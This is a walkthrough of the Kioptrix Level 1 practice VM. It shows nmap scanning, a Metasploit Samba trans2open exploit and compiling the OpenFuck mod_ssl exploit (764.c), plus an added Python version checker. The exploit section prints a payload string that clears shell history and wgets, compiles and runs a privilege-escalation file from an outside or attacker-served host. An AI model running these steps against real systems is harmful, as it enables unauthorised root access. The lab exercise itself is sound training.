Objective: Kioptrix Level 1 [VMWare]
Local Environment: BackTrack5 RC3 [VMware] (192.168.74.145)
Gateway: 192.168.74.254
Tool used: nmap
#1: Find the IP address of Kioptrix on the local network.
Tool: nmap
Command: nmap -n -sP -sn 192.168.74.0/24
This gives the Kioptrix address: 192.168.74.147.
#2: Enumerate open ports and service versions.
Tool: nmap
Open ports:
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     (rpcbind V2) 2 (rpc #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      (status V1) 1 (rpc #100024)
Samba and Apache with mod_ssl/OpenSSL are found.
This gives two routes: Samba (#3-A) and Apache/OpenSSL (#3-B).
#3-A: Samba overflow
Tool: metasploit
Command: msfconsole
Search for the module first.
Command: use exploit/linux/samba/trans2open
Command: set PAYLOAD linux/x86/shell_bind_tcp
Command: set RHOST 192.168.74.147
Command: show options
Once the options are set, run exploit ~
Command: whoami
Returns root.
Overflow successful!
#3-B: Apache mod_ssl/OpenSSL buffer overflow.
Tool: Nikto
Command: cd /pentest/web/nikto
./nikto.pl -host 192.168.74.147 -Display 124
Nikto takes a long time to run. Wait patiently ~
Relevant finding:
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
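Nikto raised the finding above by comparing the advertised mod_ssl version against the range in the advisory. The same kind of banner check, as an added Python example that is not part of this walkthrough or the tutorials it follows, run over the port-scan output from #2 (the scan text is constructed from the lines shown there; AFFECTED_UPTO is a hypothetical one-entry table built from the Nikto finding):

```python
import re

# Constructed sample: the nmap service banners from the port scan above,
# reproduced here as the input for the check.
SCAN_OUTPUT = """\
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     (rpcbind V2) 2 (rpc #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      (status V1) 1 (rpc #100024)
"""

# Hypothetical table: banner component -> highest affected version, taken
# from the Nikto finding "mod_ssl 2.8.7 and lower" (CVE-2002-0082).
AFFECTED_UPTO = {"mod_ssl": (2, 8, 7)}

def parse_version(text):
    """Turn '2.8.4' into (2, 8, 4) so versions compare numerically, not as strings
    (a string compare would wrongly rank '2.8.10' below '2.8.7')."""
    return tuple(int(p) for p in text.split("."))

def find_vulnerable_banners(scan_text):
    """Return (port, component, version, ceiling) for every open-port banner whose
    component version is at or below a known-affected ceiling."""
    findings = []
    for line in scan_text.splitlines():
        m = re.match(r"(\d+)/tcp\s+open\s+\S+\s+(.*)", line)
        if not m:
            continue
        port, banner = int(m.group(1)), m.group(2)
        for comp, ceiling in AFFECTED_UPTO.items():
            vm = re.search(re.escape(comp) + r"/(\d+(?:\.\d+)+)", banner)
            if vm and parse_version(vm.group(1)) <= ceiling:
                findings.append((port, comp, vm.group(1), ".".join(map(str, ceiling))))
    return findings

if __name__ == "__main__":
    for port, comp, ver, ceiling in find_vulnerable_banners(SCAN_OUTPUT):
        print(f"port {port}: {comp} {ver} is at or below {ceiling} (CVE-2002-0082)")
```

Both 80 and 443 are reported, since they run the same Apache build; a banner with mod_ssl 2.8.8 or newer produces no finding.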
Open the Exploit-DB website and search for Apache OpenSSL.
Download 764.c.
Compile it. The compilation fails; looking closer, the errors are about missing RC4 and MD5 declarations.
Add the headers to the source file:
#include <openssl/rc4.h>
#include <openssl/md5.h>
The exploit's command string is defined as: #define COMMAND2 "unset HISTFILE; cd /tmp; wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
This needs wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c to succeed from the target.
Alternatively, download the file yourself and serve it from the local machine, so the target wgets it from the intranet.
Change the line to: #define COMMAND2 "unset HISTFILE; cd /tmp; wget 192.168.74.145/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
Download a copy of ptrace-kmod.c.
Copy it to the /var/www/ directory.
Start the Apache service.
The compilation method given in the source comments: gcc -o OpenFuck OpenFuck.c -lcrypto
Command: gcc -o OpenFuck 764.c -lcrypto
Run ./OpenFuck to see the usage prompt; the matching target entry is:
0x6b - RedHat Linux 7.2 (apache-1.3.20-16) 2
Command: ./OpenFuck 0x6b 192.168.74.147
Command: whoami
Returns root.
Overflow successful!
#4: Run mail to read the mailbox.
Command: mail
Then 1 to read the first message.
Success ~
This is the first time..
References: the linux520 tutorial and the springemp tutorial.